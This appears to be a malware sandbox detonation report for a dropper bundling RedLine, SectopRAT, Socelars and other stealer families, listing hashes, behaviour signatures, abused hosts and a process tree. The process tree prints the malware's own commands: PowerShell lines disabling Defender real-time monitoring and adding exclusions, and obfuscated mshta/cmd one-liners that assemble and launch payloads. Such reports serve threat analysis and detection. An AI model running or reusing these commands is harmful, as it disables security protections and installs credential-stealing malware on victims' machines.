| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NVX9Z8PTS0WU4CI6G0TB.temp
| MD5 | e1fe0785abfdaf20ec9f62376f97c2a3 |
| SHA1 | b01626c55df5f089fc64b30e383f3b90a22d345d |
| SHA256 | 8c5508a1706c3350159b72bd67e400b16fda92a40fc72ac86a27602adede39f7 |
| SHA512 | a2da6235209820148667b37564a16ad23ff22acd586d51c9512346fa9f6a5f9d1a6d9ace350b3c73021f2886c7745d26670eadd84b24276c90cbaba898355b68 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
149s
Max time network
154s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2312 set thread context of 3056 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe |
| PID 1612 set thread context of 3068 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe |
| PID 1936 set thread context of 496 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe
Tue19411ac950924ec3f.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe
Tue19325eb008c0b950.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe
Tue1993b3f72c.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe
Tue19f51bcd77a.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe
Tue19c1338f41ab.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe
Tue19150ee2be694c8a4.exe /mixone
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe
Tue19c78ded4d176ac.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe
Tue19b4ef3b53293fe.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe
Tue19761b3b8d9d.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe
Tue1969586bcbf58493.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe
Tue192762f1cd058ddf8.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe
Tue193858933525b62.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe
Tue19879c4c0e.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe
Tue195c40958f528163.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe
Tue19c06f159e0ec.exe
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe"
C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp" /SL5="$8019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp" /SL5="$9019A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 488
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue193858933525b62.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
